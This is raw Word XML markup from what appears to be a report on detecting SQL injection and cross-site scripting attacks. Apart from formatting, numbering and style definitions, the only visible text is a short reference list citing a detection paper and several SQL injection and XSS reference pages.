        <w:t>V</w:t>
      </w:r>
      <w:r w:rsidR="001076B8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00892735">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.  References</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="00892735" w:rsidRDefault="00892735" w:rsidP="009A7287">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="360" w:right="30"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CB6376" w:rsidRDefault="00CB6376" w:rsidP="009A7287">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="360" w:right="30"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00892735" w:rsidRPr="00892735" w:rsidRDefault="00892735" w:rsidP="009A7287">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="360" w:right="30"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BC3317" w:rsidRPr="00BC3317" w:rsidRDefault="00BC3317" w:rsidP="00BC3317">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:right="30"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CB6376">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Haifeng</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CB6376">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CB6376">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Gu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CB6376">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB6376">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>,  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CB6376">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Jianning</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CB6376">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Zhang , </w:t>
      </w:r>
      <w:hyperlink r:id="rId26" w:history="1">
        <w:r w:rsidRPr="00CB6376">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>Tian Liu, </w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00CB6376">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId27" w:history="1">
        <w:r w:rsidRPr="00CB6376">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>Ming Hu, </w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00CB6376">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CB6376">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Junlong</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CB6376">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Zhou, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CB6376">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Tongquan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CB6376">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Wei, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CB6376">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Mingsong</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CB6376">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Chen (2020)  </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB6376">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>A Traffic-Based Framework for Detection of SQL Injection Attacks and Vulnerability Analysis of Leaked Data</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00892735" w:rsidRPr="00892735" w:rsidRDefault="00A550D9" w:rsidP="00892735">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:right="30"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId28" w:history="1">
        <w:r w:rsidR="00892735" w:rsidRPr="00892735">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://portswigger.net/web-security/sql-injection</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00892735" w:rsidRPr="00892735" w:rsidRDefault="00A550D9" w:rsidP="00892735">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:right="30"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId29" w:history="1">
        <w:r w:rsidR="00892735" w:rsidRPr="00892735">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://en.wikipedia.org/wiki/Cross-site_scripting</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00892735" w:rsidRPr="006E2503" w:rsidRDefault="00A550D9" w:rsidP="00892735">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:right="30"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId30" w:history="1">
        <w:r w:rsidR="00892735" w:rsidRPr="00892735">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://en.wikipedia.org/wiki/SQL_injection</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00BC3317" w:rsidRPr="00892735" w:rsidRDefault="00A550D9" w:rsidP="00BC3317">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:right="30"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId31" w:history="1">
        <w:r w:rsidR="00BC3317" w:rsidRPr="00892735">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://www.acunetix.com/websitesecurity/cross-site-scripting/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00BC3317" w:rsidRPr="00CB6376" w:rsidRDefault="00BC3317" w:rsidP="00BC3317">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1080" w:right="30"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CB6376" w:rsidRPr="006E2503" w:rsidRDefault="00CB6376" w:rsidP="006E2503">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="360" w:right="30"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009A7287" w:rsidRPr="009F6965" w:rsidRDefault="009A7287" w:rsidP="009A7287">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:right="30"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009A7287" w:rsidRPr="009F6965" w:rsidRDefault="009A7287" w:rsidP="009A7287">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:right="30"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FC2AFC" w:rsidRPr="009F6965" w:rsidRDefault="00FC2AFC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00FC2AFC" w:rsidRPr="009F6965" w:rsidSect="001D6F01">
      <w:footerReference w:type="default" r:id="rId3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0D9" w:rsidRDefault="00A550D9" w:rsidP="008A111A">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00A550D9" w:rsidRDefault="00A550D9" w:rsidP="008A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576376"/>
      <w:docPartObj>
        <w:docPartGallery w:val="Page Numbers (Bottom of Page)"/>
        <w:docPartUnique/>
      </w:docPartObj>
    </w:sdtPr>
    <w:sdtEndPr>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
    </w:sdtEndPr>
    <w:sdtContent>
      <w:p w:rsidR="001D6F01" w:rsidRDefault="001D6F01">
        <w:pPr>
          <w:pStyle w:val="Footer"/>
          <w:jc w:val="right"/>
        </w:pPr>
        <w:r>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:instrText xml:space="preserve"> PAGE   \* MERGEFORMAT </w:instrText>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00DA0AFB">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>4</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:p>
    </w:sdtContent>
  </w:sdt>
  <w:p w:rsidR="001D6F01" w:rsidRDefault="00044341">
    <w:pPr>
      <w:pStyle w:val="Footer"/>
    </w:pPr>
    <w:r>
      <w:t xml:space="preserve">Detection of </w:t>
    </w:r>
    <w:r w:rsidR="001D6F01">
      <w:t>SQL Injection attacks</w:t>
    </w:r>
    <w:r w:rsidR="008F20BF">
      <w:t xml:space="preserve"> and </w:t>
    </w:r>
    <w:r w:rsidR="001D6F01">
      <w:t>C</w:t>
    </w:r>
    <w:r w:rsidR="008F20BF">
      <w:t>ross-s</w:t>
    </w:r>
    <w:r w:rsidR="001D6F01">
      <w:t>ite S</w:t>
    </w:r>
    <w:r w:rsidR="008F20BF">
      <w:t>cripting attacks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0D9" w:rsidRDefault="00A550D9" w:rsidP="008A111A">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00A550D9" w:rsidRDefault="00A550D9" w:rsidP="008A11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7F0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="35CA0254"/>
    <w:lvl w:ilvl="0" w:tplc="97588082">
      <w:start w:val="1"/>
      <w:numFmt w:val="upperRoman"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1080" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:sz w:val="28"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="3738C7CC">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="default"/>
        <w:b/>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3B4212"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F5A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37BC4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E5D0E95C"/>
    <w:lvl w:ilvl="0" w:tplc="4009000F">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1080" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:b w:val="0"/>
        <w:sz w:val="28"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="3738C7CC">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="default"/>
        <w:b/>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FC2250"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3D9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D2E36"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="19E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B04C0A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D856D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E54D4D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6BF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D4777"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F5A8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615DE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FC16721E"/>
    <w:lvl w:ilvl="0" w:tplc="4009001B">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="1518" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="40090019" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2238" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="4009001B" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="2958" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="4009000F" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3678" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="40090019" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4398" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="4009001B" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="5118" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="4009000F" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5838" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="40090019" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6558" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="4009001B" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="7278" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="9">
    <w:nsid w:val="368A7C9A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C712B2B8"/>
    <w:lvl w:ilvl="0" w:tplc="4009000F">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0">
    <w:nsid w:val="39BE6F5B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8BA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2E5547"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F5A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67A58"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B1A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C1467C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="704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DB3C43"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A43E799C"/>
    <w:lvl w:ilvl="0" w:tplc="C31CAADE">
      <w:start w:val="1"/>
      <w:numFmt w:val="upperRoman"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1080" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:b w:val="0"/>
        <w:sz w:val="28"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="3738C7CC">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="default"/>
        <w:b/>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B92F1A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="517C65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F3718D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F5A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12"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="9"/>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28"/>
    <w:rsid w:val="00044341"/>
    <w:rsid w:val="001076B8"/>
    <w:rsid w:val="001D6F01"/>
    <w:rsid w:val="00216DA3"/>
    <w:rsid w:val="00363D4E"/>
    <w:rsid w:val="00615D5C"/>
    <w:rsid w:val="00620884"/>
    <w:rsid w:val="006B270A"/>
    <w:rsid w:val="006E2503"/>
    <w:rsid w:val="006F2A49"/>
    <w:rsid w:val="00771320"/>
    <w:rsid w:val="007C0695"/>
    <w:rsid w:val="007C77DA"/>
    <w:rsid w:val="008057C4"/>
    <w:rsid w:val="00892735"/>
    <w:rsid w:val="008A111A"/>
    <w:rsid w:val="008F20BF"/>
    <w:rsid w:val="00996A06"/>
    <w:rsid w:val="009A6244"/>
    <w:rsid w:val="009A7287"/>
    <w:rsid w:val="009F6965"/>
    <w:rsid w:val="00A550D9"/>
    <w:rsid w:val="00AA76DA"/>
    <w:rsid w:val="00B000F9"/>
    <w:rsid w:val="00B15619"/>
    <w:rsid w:val="00BC3317"/>
    <w:rsid w:val="00C50328"/>
    <w:rsid w:val="00CA05F8"/>
    <w:rsid w:val="00CB6376"/>
    <w:rsid w:val="00CC44E4"/>
    <w:rsid w:val="00D228D6"/>
    <w:rsid w:val="00DA0AFB"/>
    <w:rsid w:val="00DB2C10"/>
    <w:rsid w:val="00DD6777"/>
    <w:rsid w:val="00E64456"/>
    <w:rsid w:val="00EE2F3C"/>
    <w:rsid w:val="00EF1C2F"/>
    <w:rsid w:val="00F168C7"/>
    <w:rsid w:val="00F365D4"/>
    <w:rsid w:val="00F754EB"/>
    <w:rsid w:val="00FC2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0695"/>
    <w:pPr>
      <w:spacing w:after="200" w:line="27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DB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0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3D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87"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="009A7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088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20884"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="HTMLCode">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00620884"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Header">
